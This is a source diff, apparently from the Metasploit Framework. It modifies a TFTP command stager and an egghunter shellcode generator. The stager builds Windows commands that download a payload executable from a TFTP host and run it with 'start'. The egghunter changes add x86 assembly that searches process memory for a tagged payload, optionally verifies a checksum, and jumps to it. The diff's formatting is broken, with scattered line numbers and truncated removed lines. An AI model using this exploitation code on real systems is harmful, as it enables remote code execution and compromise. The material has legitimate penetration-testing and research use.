42
|
# Initiate the download
|
43
|
-
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @
|
43
|
+
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
|
44
44
|
|
45
45
|
# Make it all happen
|
46
|
-
cmds << "start #{@tempdir + @
|
46
|
+
cmds << "start #{@tempdir + @payload_exe}"
|
47
47
|
|
48
48
|
# Clean up after unless requested not to..
|
49
49
|
if (not opts[:nodelete])
|
@@ -53,11 +53,11 @@ class CmdStagerTFTP < CmdStagerBase
|
|
53
53
|
super
|
54
54
|
end
|
55
55
|
|
56
|
-
#
|
57
|
-
|
58
|
-
|
59
|
-
end
|
56
|
+
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
|
57
|
+
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
|
58
|
+
# the start command being issued separately so that it can ignore it :)
|
60
59
|
|
60
|
+
attr_reader :payload_exe
|
61
61
|
end
|
62
62
|
end
|
63
63
|
end
|
File without changes
|
@@ -12,6 +12,13 @@ module Exploitation
|
|
12
12
|
# overflow occurs, but it's possible to stick a larger payload somewhere else
|
13
13
|
# in memory that may not be directly predictable.
|
14
14
|
#
|
15
|
+
# Original implementation by skape
|
16
|
+
# (See http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf)
|
17
|
+
#
|
18
|
+
# Checksum checking implemented by dijital1/corelanc0d3r
|
19
|
+
# Checksum code merged to Egghunter by jduck
|
20
|
+
# Conversion to use Metasm by jduck
|
21
|
+
#
|
15
22
|
###
|
16
23
|
class Egghunter
|
17
24
|
|
@@ -29,21 +36,51 @@ class Egghunter
|
|
29
36
|
#
|
30
37
|
# The egg hunter stub for win/x86.
|
31
38
|
#
|
32
|
-
def hunter_stub
|
33
|
-
|
34
|
-
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
39
|
+
def hunter_stub(payload, badchars = '', opts = {})
|
40
|
+
|
41
|
+
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
|
42
|
+
marker = "0x%x" % opts[:eggtag].unpack('V').first
|
43
|
+
|
44
|
+
checksum = checksum_stub(payload, badchars, opts)
|
45
|
+
|
46
|
+
assembly = <<EOS
|
47
|
+
check_readable:
|
48
|
+
or dx,0xfff
|
49
|
+
next_addr:
|
50
|
+
inc edx
|
51
|
+
push edx
|
52
|
+
push 0x02 ; use NtAccessCheckAndAuditAlarm syscall
|
53
|
+
pop eax
|
54
|
+
int 0x2e
|
55
|
+
cmp al,5
|
56
|
+
pop edx
|
57
|
+
je check_readable
|
58
|
+
check_for_tag:
|
59
|
+
; check that the tag matches once
|
60
|
+
mov eax,#{marker}
|
61
|
+
mov edi,edx
|
62
|
+
scasd
|
63
|
+
jne next_addr
|
64
|
+
; it must match a second time too
|
65
|
+
scasd
|
66
|
+
jne next_addr
|
67
|
+
|
68
|
+
; check the checksum if the feature is enabled
|
69
|
+
#{checksum}
|
70
|
+
|
71
|
+
; jump to the payload
|
72
|
+
jmp edi
|
73
|
+
EOS
|
74
|
+
|
75
|
+
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
|
76
|
+
|
77
|
+
# return the stub
|
78
|
+
assembled_code
|
42
79
|
end
|
43
|
-
|
80
|
+
|
44
81
|
end
|
45
82
|
end
|
46
|
-
|
83
|
+
|
47
84
|
###
|
48
85
|
#
|
49
86
|
# Linux-based egghunters
|
@@ -58,16 +95,46 @@ class Egghunter
|
|
58
95
|
#
|
59
96
|
# The egg hunter stub for linux/x86.
|
60
97
|
#
|
61
|
-
def hunter_stub
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
98
|
+
def hunter_stub(payload, badchars = '', opts = {})
|
99
|
+
|
100
|
+
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
|
101
|
+
marker = "0x%x" % opts[:eggtag].unpack('V').first
|
102
|
+
|
103
|
+
checksum = checksum_stub(payload, badchars, opts)
|
104
|
+
|
105
|
+
assembly = <<EOS
|
106
|
+
cld
|
107
|
+
check_readable:
|
108
|
+
or cx,0xfff
|
109
|
+
next_addr:
|
110
|
+
inc ecx
|
111
|
+
push 0x43 ; use 'sigaction' syscall
|
112
|
+
pop eax
|
113
|
+
int 0x80
|
114
|
+
cmp al,0xf2
|
115
|
+
je check_readable
|
116
|
+
|
117
|
+
check_for_tag:
|
118
|
+
; check that the tag matches once
|
119
|
+
mov eax,#{marker}
|
120
|
+
mov edi,ecx
|
121
|
+
scasd
|
122
|
+
jne next_addr
|
123
|
+
; it must match a second time too
|
124
|
+
scasd
|
125
|
+
jne next_addr
|
126
|
+
|
127
|
+
; check the checksum if the feature is enabled
|
128
|
+
#{checksum}
|
129
|
+
|
130
|
+
; jump to the payload
|
131
|
+
jmp edi
|
132
|
+
EOS
|
133
|
+
|
134
|
+
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
|
135
|
+
|
136
|
+
# return the stub
|
137
|
+
assembled_code
|
71
138
|
end
|
72
139
|
|
73
140
|
end
|
@@ -88,7 +155,7 @@ class Egghunter
|
|
88
155
|
Egghunter.constants.each { |c|
|
89
156
|
mod = self.class.const_get(c)
|
90
157
|
|
91
|
-
next if ((!mod.kind_of?(::Module)) or
|
158
|
+
next if ((!mod.kind_of?(::Module)) or
|
92
159
|
(!mod.const_defined?('Alias')))
|
93
160
|
|
94
161
|
if (platform =~ /#{mod.const_get('Alias')}/i)
|
@@ -98,7 +165,7 @@ class Egghunter
|
|
98
165
|
mod.constants.each { |a|
|
99
166
|
amod = mod.const_get(a)
|
100
167
|
|
101
|
-
next if ((!amod.kind_of?(::Module)) or
|
168
|
+
next if ((!amod.kind_of?(::Module)) or
|
102
169
|
(!amod.const_defined?('Alias')))
|
103
170
|
|
104
171
|
if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
|
@@ -115,17 +182,29 @@ class Egghunter
|
|
115
182
|
#
|
116
183
|
# This method generates an egghunter using the derived hunter stub.
|
117
184
|
#
|
118
|
-
def generate(badchars = '')
|
119
|
-
|
120
|
-
|
121
|
-
|
122
|
-
|
123
|
-
|
124
|
-
|
125
|
-
|
126
|
-
|
185
|
+
def generate(payload, badchars = '', opts = {})
|
186
|
+
# set defaults if options are missing
|
187
|
+
|
188
|
+
# NOTE: there is no guarantee this won't exist in memory, even when doubled.
|
189
|
+
# To address this, use the checksum feature :)
|
190
|
+
opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
|
191
|
+
|
192
|
+
# Generate the hunter_stub portion
|
193
|
+
return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
|
194
|
+
|
195
|
+
# Generate the marker bits to be prefixed to the real payload
|
196
|
+
egg = ''
|
197
|
+
egg << opts[:eggtag] * 2
|
198
|
+
egg << payload
|
199
|
+
if opts[:checksum]
|
200
|
+
cksum = 0
|
201
|
+
payload.each_byte { |b|
|
202
|
+
cksum += b
|
203
|
+
}
|
204
|
+
egg << [cksum & 0xff].pack('C')
|
205
|
+
end
|
127
206
|
|
128
|
-
return [
|
207
|
+
return [ hunter, egg ]
|
129
208
|
end
|
130
209
|
|
131
210
|
protected
|
@@ -134,10 +213,38 @@ protected
|
|
134
213
|
# Stub method that is meant to be overridden. It returns the raw stub that
|
135
214
|
# should be used as the egghunter.
|
136
215
|
#
|
137
|
-
def hunter_stub
|
216
|
+
def hunter_stub(payload, badchars = '', opts = {})
|
217
|
+
end
|
218
|
+
|
219
|
+
def checksum_stub(payload, badchars = '', opts = {})
|
220
|
+
return '' if not opts[:checksum]
|
221
|
+
|
222
|
+
if payload.length < 0x100
|
223
|
+
cmp_reg = "cl"
|
224
|
+
elsif payload.length < 0x10000
|
225
|
+
cmp_reg = "cx"
|
226
|
+
else
|
227
|
+
raise RuntimeError, "Payload too big!"
|
228
|
+
end
|
229
|
+
egg_size = "0x%x" % payload.length
|
230
|
+
|
231
|
+
checksum = <<EOS
|
232
|
+
push ecx
|
233
|
+
xor ecx,ecx
|
234
|
+
xor eax,eax
|
235
|
+
calc_chksum_loop:
|
236
|
+
add al,byte [edi+ecx]
|
237
|
+
inc ecx
|
238
|
+
cmp #{cmp_reg},#{egg_size}
|
239
|
+
jnz calc_chksum_loop
|
240
|
+
test_chksum:
|
241
|
+
cmp al,byte [edi+ecx]
|
242
|
+
pop ecx
|
243
|
+
jnz next_addr
|
244
|
+
EOS
|
138
245
|
end
|
139
246
|
|
140
247
|
end
|
141
248
|
|
142
249
|
end
|
143
|
-
end
|
250
|
+
end
|